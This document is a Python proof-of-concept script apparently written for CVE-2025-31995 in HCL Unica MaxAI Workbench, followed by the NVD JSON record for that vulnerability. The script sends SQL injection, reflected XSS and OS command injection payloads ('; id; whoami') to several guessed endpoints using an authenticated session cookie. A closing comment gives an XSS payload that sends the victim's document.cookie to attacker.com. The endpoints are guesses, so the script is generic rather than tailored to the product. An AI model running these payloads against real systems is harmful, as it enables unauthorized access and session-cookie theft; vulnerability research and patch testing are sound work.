CVE-2025-31995

# CVE-2025-31995 - HCL Unica MaxAI Workbench Improper Input Validation PoC # This PoC demonstrates potential injection vectors due to improper input validation. # Note: Actual exploitation requires valid low-privilege credentials. import requests TARGET_URL = "https://target-hcl-unica-maxai.example.com" SESSION_COOKIES = {"JSESSIONID": "VALID_SESSION_ID_HERE"} # Requires low-privilege auth # --- Payload 1: SQL Injection test --- SQL_PAYLOAD = "' OR '1'='1' --" # --- Payload 2: Reflected XSS test --- XSS_PAYLOAD = "<script>alert('XSS-CVE-2025-31995')</script>" # --- Payload 3: Command Injection test --- CMD_PAYLOAD = "; id; whoami" def test_sql_injection(endpoint): """Test for SQL injection via input field""" params = {"search": SQL_PAYLOAD, "filter": "name"} try: r = requests.get(f"{TARGET_URL}{endpoint}", params=params, cookies=SESSION_COOKIES, timeout=10) if "syntax error" in r.text.lower() or "sql" in r.text.lower(): print(f"[+] Possible SQL Injection at {endpoint}") return True except Exception as e: print(f"[-] Error: {e}") return False def test_xss(endpoint): """Test for reflected XSS via input field""" params = {"q": XSS_PAYLOAD} try: r = requests.get(f"{TARGET_URL}{endpoint}", params=params, cookies=SESSION_COOKIES, timeout=10) if XSS_PAYLOAD in r.text: print(f"[+] Reflected XSS confirmed at {endpoint}") return True except Exception as e: print(f"[-] Error: {e}") return False def test_cmd_injection(endpoint): """Test for OS command injection via input field""" data = {"input": CMD_PAYLOAD} try: r = requests.post(f"{TARGET_URL}{endpoint}", data=data, cookies=SESSION_COOKIES, timeout=10) if "uid=" in r.text or "root" in r.text: print(f"[+] Command Injection confirmed at {endpoint}") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": # Common endpoints in MaxAI Workbench that may handle user input endpoints = ["/api/search", "/workbench/query", "/ai/prompt", "/dashboard/filter"] for ep in endpoints: test_sql_injection(ep) test_xss(ep) test_cmd_injection(ep) # --- Crafted malicious URL for victim interaction (UI:R) --- # Example: https://target/endpoint?q=<script>fetch('http://attacker.com/?c='+document.cookie)</script>

{"cve": {"id": "CVE-2025-31995", "sourceIdentifier": "[email protected]", "published": "2025-10-13T05:15:50.970", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Unica MaxAI Workbench is vulnerable to improper input validation. This allows attackers to exploit vulnerabilities such as SQL Injection, XSS, or command injection, leading to unauthorized access or data breaches, etc."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124425", "source": "[email protected]"}]}}